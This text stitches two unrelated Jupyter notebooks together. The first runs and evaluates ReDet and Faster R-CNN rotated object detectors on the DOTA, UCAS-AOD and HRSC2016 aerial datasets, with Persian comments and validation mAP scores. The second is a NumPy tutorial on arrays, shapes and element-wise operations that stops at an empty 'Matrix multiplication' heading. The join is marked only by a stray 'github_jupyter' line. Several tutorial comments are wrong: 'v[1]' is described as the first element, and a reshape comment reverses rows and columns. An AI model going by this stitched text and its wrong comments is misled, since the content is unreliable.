!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl
#new-----dotanew1024
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl
#val
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/valresults.pkl
```
faster_rcnn_obb_r50_fpn_1x_dota.py test
```
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl
#new-----dotanew1024
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl
#val
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/valresults.pkl
```
# faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD **testing**
```
!python /content/ReDet/tools/test.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_36.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/results.pkl
```
# **HSRC2016** ReDet
```
# generate results
!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py \
/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/ReDet_re50_refpn_3x_hrsc2016-d1b4bd29.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/results.pkl
# evaluation
# remeber to modify the results path in hrsc2016_evaluation.py
# !python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
```
/content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
```
%%writefile /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
# --------------------------------------------------------
# dota_evaluation_task1
# Licensed under The MIT License [see LICENSE for details]
# Written by Jian Ding, based on code from Bharath Hariharan
# --------------------------------------------------------
"""
To use the code, users should to config detpath, annopath and imagesetfile
detpath is the path for 15 result files, for the format, you can refer to "http://captain.whu.edu.cn/DOTAweb/tasks.html"
search for PATH_TO_BE_CONFIGURED to config the paths
Note, the evaluation is on the large scale images
"""
import xml.etree.ElementTree as ET
import os
#import cPickle
import numpy as np
import matplotlib.pyplot as plt
import polyiou
from functools import partial
def parse_gt(filename):
"""
:param filename: ground truth file to parse
:return: all instances in a picture
"""
objects = []
with open(filename, 'r') as f:
while True:
line = f.readline()
if line:
splitlines = line.strip().split(' ')
object_struct = {}
if (len(splitlines) < 9):
continue
object_struct['name'] = splitlines[8]
if (len(splitlines) == 9):
object_struct['difficult'] = 0
elif (len(splitlines) == 10):
object_struct['difficult'] = int(splitlines[9])
object_struct['bbox'] = [float(splitlines[0]),
float(splitlines[1]),
float(splitlines[2]),
float(splitlines[3]),
float(splitlines[4]),
float(splitlines[5]),
float(splitlines[6]),
float(splitlines[7])]
objects.append(object_struct)
else:
break
return objects
def voc_ap(rec, prec, use_07_metric=False):
""" ap = voc_ap(rec, prec, [use_07_metric])
Compute VOC AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec >= t) == 0:
p = 0
else:
p = np.max(prec[rec >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def voc_eval(detpath,
annopath,
imagesetfile,
classname,
# cachedir,
ovthresh=0.5,
use_07_metric=False):
"""rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
[ovthresh],
[use_07_metric])
Top level function that does the PASCAL VOC evaluation.
detpath: Path to detections
detpath.format(classname) should produce the detection results file.
annopath: Path to annotations
annopath.format(imagename) should be the xml annotations file.
imagesetfile: Text file containing the list of images, one image per line.
classname: Category name (duh)
cachedir: Directory for caching the annotations
[ovthresh]: Overlap threshold (default = 0.5)
[use_07_metric]: Whether to use VOC07's 11 point AP computation
(default False)
"""
# assumes detections are in detpath.format(classname)
# assumes annotations are in annopath.format(imagename)
# assumes imagesetfile is a text file with each line an image name
# cachedir caches the annotations in a pickle file
# first load gt
#if not os.path.isdir(cachedir):
# os.mkdir(cachedir)
#cachefile = os.path.join(cachedir, 'annots.pkl')
# read list of images
with open(imagesetfile, 'r') as f:
lines = f.readlines()
imagenames = [x.strip() for x in lines]
#print('imagenames: ', imagenames)
#if not os.path.isfile(cachefile):
# load annots
recs = {}
for i, imagename in enumerate(imagenames):
#print('parse_files name: ', annopath.format(imagename))
recs[imagename] = parse_gt(annopath.format(imagename))
#if i % 100 == 0:
# print ('Reading annotation for {:d}/{:d}'.format(
# i + 1, len(imagenames)) )
# save
#print ('Saving cached annotations to {:s}'.format(cachefile))
#with open(cachefile, 'w') as f:
# cPickle.dump(recs, f)
#else:
# load
#with open(cachefile, 'r') as f:
# recs = cPickle.load(f)
# extract gt objects for this class
class_recs = {}
npos = 0
for imagename in imagenames:
R = [obj for obj in recs[imagename] if obj['name'] == classname]
bbox = np.array([x['bbox'] for x in R])
difficult = np.array([x['difficult'] for x in R]).astype(np.bool)
det = [False] * len(R)
npos = npos + sum(~difficult)
class_recs[imagename] = {'bbox': bbox,
'difficult': difficult,
'det': det}
# read dets from Task1* files
detfile = detpath.format(classname)
with open(detfile, 'r') as f:
lines = f.readlines()
splitlines = [x.strip().split(' ') for x in lines]
image_ids = [x[0] for x in splitlines]
confidence = np.array([float(x[1]) for x in splitlines])
#print('check confidence: ', confidence)
BB = np.array([[float(z) for z in x[2:]] for x in splitlines])
# sort by confidence
sorted_ind = np.argsort(-confidence)
sorted_scores = np.sort(-confidence)
#print('check sorted_scores: ', sorted_scores)
#print('check sorted_ind: ', sorted_ind)
## note the usage only in numpy not for list
BB = BB[sorted_ind, :]
image_ids = [image_ids[x] for x in sorted_ind]
#print('check imge_ids: ', image_ids)
#print('imge_ids len:', len(image_ids))
# go down dets and mark TPs and FPs
nd = len(image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for d in range(nd):
##############################################################################################################
filename, file_extension = os.path.splitext(image_ids[d])
R = class_recs[ filename]
# R = class_recs[image_ids[d]]##############################################################################
bb = BB[d, :].astype(float)
ovmax = -np.inf
BBGT = R['bbox'].astype(float)
## compute det bb with each BBGT
if BBGT.size > 0:
# compute overlaps
# intersection
# 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.
# pdb.set_trace()
BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)
BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)
BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)
BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)
bb_xmin = np.min(bb[0::2])
bb_ymin = np.min(bb[1::2])
bb_xmax = np.max(bb[0::2])
bb_ymax = np.max(bb[1::2])
ixmin = np.maximum(BBGT_xmin, bb_xmin)
iymin = np.maximum(BBGT_ymin, bb_ymin)
ixmax = np.minimum(BBGT_xmax, bb_xmax)
iymax = np.minimum(BBGT_ymax, bb_ymax)
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +
(BBGT_xmax - BBGT_xmin + 1.) *
(BBGT_ymax - BBGT_ymin + 1.) - inters)
overlaps = inters / uni
BBGT_keep_mask = overlaps > 0
BBGT_keep = BBGT[BBGT_keep_mask, :]
BBGT_keep_index = np.where(overlaps > 0)[0]
# pdb.set_trace()
def calcoverlaps(BBGT_keep, bb):
overlaps = []
for index, GT in enumerate(BBGT_keep):
overlap = polyiou.iou_poly(polyiou.VectorDouble(BBGT_keep[index]), polyiou.VectorDouble(bb))
overlaps.append(overlap)
return overlaps
if len(BBGT_keep) > 0:
overlaps = calcoverlaps(BBGT_keep, bb)
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
# pdb.set_trace()
jmax = BBGT_keep_index[jmax]
if ovmax > ovthresh:
if not R['difficult'][jmax]:
if not R['det'][jmax]:
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
# compute precision recall
print('check fp:', fp)
print('check tp', tp)
print('npos num:', npos)
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(npos)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = voc_ap(rec, prec, use_07_metric)
return rec, prec, ap
def main():
detpath = r'/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/Task1_{:s}.txt'
annopath = r'/content/ReDet/data/HRSC2016/Test/labelTxt/{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
imagesetfile = r'/content/ReDet/data/HRSC2016/Test/test.txt'
# For HRSC2016
classnames = ['ship']
classaps = []
map = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
# umcomment to show p-r curve of each category
# plt.figure(figsize=(8,4))
# plt.xlabel('recall')
# plt.ylabel('precision')
# plt.plot(rec, prec)
# plt.show()
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
if __name__ == '__main__':
main()
# evaluation
# remeber to modify the results path in hrsc2016_evaluation.py
!python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
```
# برای پارس کردن فایل **ولیدیشن** کد زیر اجرا شود
```
# %pycat /content/AerialDetection/tools/parse_results.py
%%writefile /content/ReDet/tools/parse_results.py
from __future__ import division
import argparse
import os.path as osp
import shutil
import tempfile
import mmcv
from mmdet.apis import init_dist
from mmdet.core import results2json, coco_eval, \
HBBSeg2Comp4, OBBDet2Comp4, OBBDetComp4, \
HBBOBB2Comp4, HBBDet2Comp4
import argparse
from mmdet import __version__
from mmdet.datasets import get_dataset
from mmdet.apis import (train_detector, init_dist, get_root_logger,
set_random_seed)
from mmdet.models import build_detector
import torch
import json
from mmcv import Config
import sys
# sys.path.insert(0, '../')
# import DOTA_devkit.ResultMerge_multi_process as RM
from DOTA_devkit.ResultMerge_multi_process import *
# import pdb; pdb.set_trace()
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
parser.add_argument('--config', default='configs/DOTA/faster_rcnn_r101_fpn_1x_dota2_v3_RoITrans_v5.py')
parser.add_argument('--type', default=r'HBB',
help='parse type of detector')
args = parser.parse_args()
return args
def OBB2HBB(srcpath, dstpath):
filenames = util.GetFileFromThisRootDir(srcpath)
if not os.path.exists(dstpath):
os.makedirs(dstpath)
for file in filenames:
with open(file, 'r') as f_in:
with open(os.path.join(dstpath, os.path.basename(os.path.splitext(file)[0]) + '.txt'), 'w') as f_out:
lines = f_in.readlines()
splitlines = [x.strip().split() for x in lines]
for index, splitline in enumerate(splitlines):
imgname = splitline[0]
score = splitline[1]
poly = splitline[2:]
poly = list(map(float, poly))
xmin, xmax, ymin, ymax = min(poly[0::2]), max(poly[0::2]), min(poly[1::2]), max(poly[1::2])
rec_poly = [xmin, ymin, xmax, ymax]
outline = imgname + ' ' + score + ' ' + ' '.join(map(str, rec_poly))
if index != (len(splitlines) - 1):
outline = outline + '\n'
f_out.write(outline)
def parse_results(config_file, resultfile, dstpath, type):
cfg = Config.fromfile(config_file)
data_test = cfg.data['test']
dataset = get_dataset(data_test)
outputs = mmcv.load(resultfile)
if type == 'OBB':
# dota1 has tested
obb_results_dict = OBBDetComp4(dataset, outputs)
current_thresh = 0.1
elif type == 'HBB':
# dota1 has tested
hbb_results_dict = HBBDet2Comp4(dataset, outputs)
elif type == 'HBBOBB':
# dota1 has tested
# dota2
hbb_results_dict, obb_results_dict = HBBOBB2Comp4(dataset, outputs)
current_thresh = 0.3
elif type == 'Mask':
# TODO: dota1 did not pass
# dota2, hbb has passed, obb has passed
hbb_results_dict, obb_results_dict = HBBSeg2Comp4(dataset, outputs)
current_thresh = 0.3
dataset_type = cfg.dataset_type
if 'obb_results_dict' in vars():
if not os.path.exists(os.path.join(dstpath, 'Task1_results')):
os.makedirs(os.path.join(dstpath, 'Task1_results'))
for cls in obb_results_dict:
with open(os.path.join(dstpath, 'Task1_results', cls + '.txt'), 'w') as obb_f_out:
for index, outline in enumerate(obb_results_dict[cls]):
if index != (len(obb_results_dict[cls]) - 1):
obb_f_out.write(outline + '\n')
else:
obb_f_out.write(outline)
if not os.path.exists(os.path.join(dstpath, 'Task1_results_nms')):
os.makedirs(os.path.join(dstpath, 'Task1_results_nms'))
mergebypoly_multiprocess(os.path.join(dstpath, 'Task1_results'),
os.path.join(dstpath, 'Task1_results_nms'), nms_type=r'py_cpu_nms_poly_fast', o_thresh=current_thresh)
OBB2HBB(os.path.join(dstpath, 'Task1_results_nms'),
os.path.join(dstpath, 'Transed_Task2_results_nms'))
if 'hbb_results_dict' in vars():
if not os.path.exists(os.path.join(dstpath, 'Task2_results')):
os.makedirs(os.path.join(dstpath, 'Task2_results'))
for cls in hbb_results_dict:
with open(os.path.join(dstpath, 'Task2_results', cls + '.txt'), 'w') as f_out:
for index, outline in enumerate(hbb_results_dict[cls]):
if index != (len(hbb_results_dict[cls]) - 1):
f_out.write(outline + '\n')
else:
f_out.write(outline)
if not os.path.exists(os.path.join(dstpath, 'Task2_results_nms')):
os.makedirs(os.path.join(dstpath, 'Task2_results_nms'))
mergebyrec(os.path.join(dstpath, 'Task2_results'),
os.path.join(dstpath, 'Task2_results_nms'))
if __name__ == '__main__':
args = parse_args()
config_file = args.config
config_name = os.path.splitext(os.path.basename(config_file))[0]
######################################################################################/content/AerialDetection/work_dirs
# pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'results.pkl')
pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'valresults.pkl')
output_path = os.path.join('/content/ReDet/work_dirs', config_name)
type = args.type
parse_results(config_file, pkl_file, output_path, type)
```
# به کمک دستورات زیر از فایل تولید شدهی سریالایز شده سه فلدر پارس شده دریافت میشود
```
!python /content/ReDet/tools/parse_results.py --config /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py --type OBB
```
باید دانلود شده زیپ شده و آپلود شود Task1_results_nms برای ارزیابی تسک اول فایل
```
#!tar -cvf '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms.tar' '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms'
```
# ارزیابی val
```
import glob
import os
os.chdir(r'/content/ReDet/data/dota/val/images')
# myFiles = glob.glob('*.bmp')
%ls -1 | sed 's/\.png//g' > ./testset.txt
# print(myFiles)
!mv '/content/ReDet/data/dota/val/images/testset.txt' '/content/ReDet/data/dota/val'
%%writefile /content/ReDet/DOTA_devkit/dota_evaluation_task1.py
import os
import xml.etree.ElementTree as ET
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.insert(1,os.path.dirname(__file__))
import polyiou
import argparse
def parse_gt(filename):
"""
:param filename: ground truth file to parse
:return: all instances in a picture
"""
objects = []
with open(filename, 'r') as f:
while True:
line = f.readline()
if line:
splitlines = line.strip().split(' ')
object_struct = {}
if (len(splitlines) < 9):
continue
object_struct['name'] = splitlines[8]
if (len(splitlines) == 9):
object_struct['difficult'] = 0
elif (len(splitlines) == 10):
object_struct['difficult'] = int(splitlines[9])
object_struct['bbox'] = [float(splitlines[0]),
float(splitlines[1]),
float(splitlines[2]),
float(splitlines[3]),
float(splitlines[4]),
float(splitlines[5]),
float(splitlines[6]),
float(splitlines[7])]
objects.append(object_struct)
else:
break
return objects
def voc_ap(rec, prec, use_07_metric=False):
""" ap = voc_ap(rec, prec, [use_07_metric])
Compute VOC AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec >= t) == 0:
p = 0
else:
p = np.max(prec[rec >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def voc_eval(detpath,
annopath,
imagesetfile,
classname,
# cachedir,
ovthresh=0.5,
use_07_metric=False):
"""rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
[ovthresh],
[use_07_metric])
Top level function that does the PASCAL VOC evaluation.
detpath: Path to detections
detpath.format(classname) should produce the detection results file.
annopath: Path to annotations
annopath.format(imagename) should be the xml annotations file.
imagesetfile: Text file containing the list of images, one image per line.
classname: Category name (duh)
cachedir: Directory for caching the annotations
[ovthresh]: Overlap threshold (default = 0.5)
[use_07_metric]: Whether to use VOC07's 11 point AP computation
(default False)
"""
# assumes detections are in detpath.format(classname)
# assumes annotations are in annopath.format(imagename)
# assumes imagesetfile is a text file with each line an image name
# cachedir caches the annotations in a pickle file
# read list of images
with open(imagesetfile, 'r') as f:
lines = f.readlines()
imagenames = [x.strip() for x in lines]
recs = {}
for i, imagename in enumerate(imagenames):
##############################################################################################################
# print('parse_files name: ', annopath.format(imagename))
recs[imagename] = parse_gt(annopath.format(imagename))
# extract gt objects for this class
class_recs = {}
npos = 0
for imagename in imagenames:
R = [obj for obj in recs[imagename] if obj['name'] == classname]
bbox = np.array([x['bbox'] for x in R])
difficult = np.array([x['difficult'] for x in R]).astype(np.bool)
det = [False] * len(R)
npos = npos + sum(~difficult)
class_recs[imagename] = {'bbox': bbox,
'difficult': difficult,
'det': det}
# read dets from Task1* files
detfile = detpath.format(classname)
with open(detfile, 'r') as f:
lines = f.readlines()
splitlines = [x.strip().split(' ') for x in lines]
image_ids = [x[0] for x in splitlines]
confidence = np.array([float(x[1]) for x in splitlines])
BB = np.array([[float(z) for z in x[2:]] for x in splitlines])
# sort by confidence
sorted_ind = np.argsort(-confidence)
sorted_scores = np.sort(-confidence)
# note the usage only in numpy not for list
BB = BB[sorted_ind, :]
image_ids = [image_ids[x] for x in sorted_ind]
# go down dets and mark TPs and FPs
nd = len(image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for d in range(nd):
R = class_recs[image_ids[d]]
bb = BB[d, :].astype(float)
ovmax = -np.inf
BBGT = R['bbox'].astype(float)
# compute det bb with each BBGT
if BBGT.size > 0:
# compute overlaps
# intersection
# 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.
BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)
BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)
BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)
BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)
bb_xmin = np.min(bb[0::2])
bb_ymin = np.min(bb[1::2])
bb_xmax = np.max(bb[0::2])
bb_ymax = np.max(bb[1::2])
ixmin = np.maximum(BBGT_xmin, bb_xmin)
iymin = np.maximum(BBGT_ymin, bb_ymin)
ixmax = np.minimum(BBGT_xmax, bb_xmax)
iymax = np.minimum(BBGT_ymax, bb_ymax)
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +
(BBGT_xmax - BBGT_xmin + 1.) *
(BBGT_ymax - BBGT_ymin + 1.) - inters)
overlaps = inters / uni
BBGT_keep_mask = overlaps > 0
BBGT_keep = BBGT[BBGT_keep_mask, :]
BBGT_keep_index = np.where(overlaps > 0)[0]
def calcoverlaps(BBGT_keep, bb):
overlaps = []
for index, GT in enumerate(BBGT_keep):
overlap = polyiou.iou_poly(polyiou.VectorDouble(
BBGT_keep[index]), polyiou.VectorDouble(bb))
overlaps.append(overlap)
return overlaps
if len(BBGT_keep) > 0:
overlaps = calcoverlaps(BBGT_keep, bb)
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
# pdb.set_trace()
jmax = BBGT_keep_index[jmax]
if ovmax > ovthresh:
if not R['difficult'][jmax]:
if not R['det'][jmax]:
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
# compute precision recall
print('check fp:', fp)
print('check tp', tp)
print('npos num:', npos)
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(npos)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = voc_ap(rec, prec, use_07_metric)
return rec, prec, ap
def dota_task1_eval(work_dir, det_dir):
detpath = os.path.join(det_dir, r'Task1_{:s}.txt')
annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'
imagesetfile = r'data/dota/test/testset.txt'
# For DOTA-v1.0
classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
classaps = []
map = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
# writing results to txt file
with open(os.path.join(work_dir, 'Task1_results.txt'), 'w') as f:
out_str = ''
out_str += 'mAP:'+str(map)+'\n'
out_str += 'APs:\n'
out_str += ' '.join([str(ap)for ap in classaps.tolist()])
f.write(out_str)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--work_dir',default='')
return parser.parse_args()
def main():
args = parse_args()
# detpath = os.path.join(args.work_dir,'Task1_results_nms/Task1_{:s}.txt')
detpath = os.path.join(args.work_dir,'Task1_results_nms/{:s}.txt')
###################################################################################################################
# change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
# annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'
# imagesetfile = r'data/dota/test/testset.txt'
annopath = r'/content/ReDet/data/dota/val/labelTxt/{:s}.txt'
imagesetfile = r'/content/ReDet/data/dota/val/testset.txt'
# For DOTA-v1.5
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter', 'container-crane']
# For DOTA-v1.0
classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
classaps = []
map = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
# # umcomment to show p-r curve of each category
# plt.figure(figsize=(8,4))
# plt.xlabel('Recall')
# plt.ylabel('Precision')
# plt.xticks(fontsize=11)
# plt.yticks(fontsize=11)
# plt.xlim(0, 1)
# plt.ylim(0, 1)
# ax = plt.gca()
# ax.spines['top'].set_color('none')
# ax.spines['right'].set_color('none')
# plt.plot(rec, prec)
# # plt.show()
# plt.savefig('pr_curve/{}.png'.format(classname))
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
if __name__ == '__main__':
main()
!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1
!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota
!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota
```
# لیست خروجی ولیدیشنها
**ReDet**
map: 0.8514600172670281
classaps: [90.74063962 88.35952404 70.27778167 83.69586216 71.37892832 88.03846396
88.83972303 90.90909091 89.87234694 90.00746689 90.00924415 82.27596327
88.32895278 80.09628041 84.35975774]
**faster_rcnn_RoITrans_r50_fpn_1x_dota**
map: 0.8416679746473459
classaps: [90.14526646 87.5615606 73.58691439 80.72462287 74.76489526 88.86002316
88.68232501 90.59249634 87.15753582 90.14873059 75.92481942 85.70194711
87.96535504 81.13566148 79.54980843]
**faster_rcnn_obb_r50_fpn_1x_dota**
map: 0.7869873566873331
classaps: [90.22626651 83.21467398 60.88286463 66.33192138 70.29939163 84.09063058
88.17042018 90.89576113 80.49975872 89.18961722 78.22831552 79.33052598
75.461711 71.27527659 72.38389998]
|
github_jupyter
|
## Importing the library
```
import numpy as np
```
## Data Types
### Scalars
```
# creating a scalar, we use the 'array' in order to create any type of data type e.g. scalar, vector, matrix
s = np.array(5)
# visualizing the shape of a scalar, in the example below it returns an empty tuple which is normal
# a scalar has zero-length which in numpy is represented as an empty tuple
print(s.shape)
# we can do operations on a scalar e.g addition
x = s + 3
print(x)
```
### Vectors
```
# creating a vector. we have to pass a list as input
v = np.array([1,2,3])
# visualizing the shape, a 3-long row vector. This can also be stored as a column vector
print(v.shape)
# access first element
v[1]
# access from second to last
v[1:]
```
### Matrices
```
# creating a matrix, with a list of lists as input
m = np.array([[1,2,3], [4,5,6], [7,8,9]])
# visualize shape, a 3 x 3 matrix
m.shape
# access from the second row, first two elements
m[1,:2]
# access elements from all rows from the third column
m[:,-1]
```
### Tensors
```
# creating a 4-dimensional tensor
t = np.array([[[[1],[2]],[[3],[4]],[[5],[6]]],[[[7],[8]],\
[[9],[10]],[[11],[12]]],[[[13],[14]],[[15],[16]],[[17],[17]]]])
# visualize shape, this structure is going to be used a lot of times in PyTorch and other deep learning frameworks
t.shape
# access number 16, we have to pass through the dimensions by using multiple indices
# in order to get to the value
t[2][1][1][0]
```
### Changing shapes
Sometimes you'll need to change the shape of your data without actually changing its contents. For example, you may have a vector, which is one-dimensional, but need a matrix, which is two-dimensional.
```
# let's say we have a row vector
v = np.array([1,2,3,4])
v.shape
# what if we wanted a 1x4 matrix instead but without re-declaring the variable
x = v.reshape(1,4) # specify the column size, then the row size
print(x)
x.shape
# and we could change back to 4x1
x = x.reshape(4,1)
print(x)
x.shape
```
#### Other way of changing shape
From Udacity: Those lines create a slice that looks at all of the items of `v` but asks NumPy to add a new dimension of size 1 for the associated axis. It may look strange to you now, but it's a common technique so it's good to be aware of it.
```
# other ways to reshape using slicing which is a very common practice when working with numpy arrays
# this is essentially telling us slice the array, give me all the columns and put them under one column
x = v[None, :]
print(x)
x.shape
# give me all the rows and put them in one column
x = v[:, None]
print(x)
x.shape
```
### Element-wise operations
```
# performing a scalar addition
values = [1,2,3,4,5]
values = np.array(values) + 5
print(values)
# scalar multiplication, you can either use operators or functions
some_values = [2,3,4,5]
x = np.multiply(some_values, 5)
print(x)
y = np.array(some_values) * 5
print(y)
# set every element to 0 in a matrix
m = np.array([1,27,98, 5])
print(m)
# now every element in m is zero, no matter how many dimensions it has
m *= 0
print(m)
```
### Element-wise Matrix Operations
The **key** here is to remember that these operations work only with matrices of the same shape,
if the shapes are different then we couldn't perform the addition as below
```
a = np.array([[1,3],[5,7]])
b = np.array([[2,4],[6,8]])
a + b
```
### Matrix multiplication
